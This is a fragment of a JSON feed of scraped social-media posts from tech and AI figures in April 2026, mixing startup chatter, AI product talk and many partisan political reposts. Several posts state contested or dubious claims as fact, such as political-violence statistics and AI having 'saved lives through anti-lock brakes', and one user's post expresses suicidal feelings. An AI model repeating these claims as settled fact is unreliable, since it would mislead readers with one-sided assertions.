"https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo", + "url": "https://nitter.net/images_i_love3/status/2048061157685010444#m", + "published_at": "2026-04-25T15:26:45+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. \n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab", + "url": "https://nitter.net/erikbryn/status/2047874760542200042#m", + "published_at": "2026-04-25T03:06:05+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/", + "url": "https://nitter.net/RonnieChatterji/status/2047821064437424288#m", + "published_at": "2026-04-24T23:32:43+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Baby’s first con", + "url": "https://nitter.net/Aaron_Margolin/status/2047748882952778044#m", + "published_at": "2026-04-24T18:45:53+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!", + "url": "https://nitter.net/tokidoki/status/2047723587528782152#m", + "published_at": "2026-04-24T17:05:22+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Good morning! Rise and shine, gamers!", + "url": "https://nitter.net/shopculturefly/status/2047711254379393160#m", + "published_at": "2026-04-24T16:16:22+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "Im genuinely this Close to killing myself rn & this Shit happens like Okay", + "url": "https://nitter.net/satoshibun/status/2047641832624893993#m", + "published_at": "2026-04-24T11:40:30+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it", + "url": "https://nitter.net/DaCapTainXD/status/2047633324676440561#m", + "published_at": "2026-04-24T11:06:42+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 😾", + "url": "https://nitter.net/aaa___kanato/status/2047606779677376714#m", + "published_at": "2026-04-24T09:21:13+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher", + "url": "https://nitter.net/eeo_store/status/2047586383519531500#m", + "published_at": "2026-04-24T08:00:10+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00" + }, + { + "handle": "naval", + "account": "@naval", 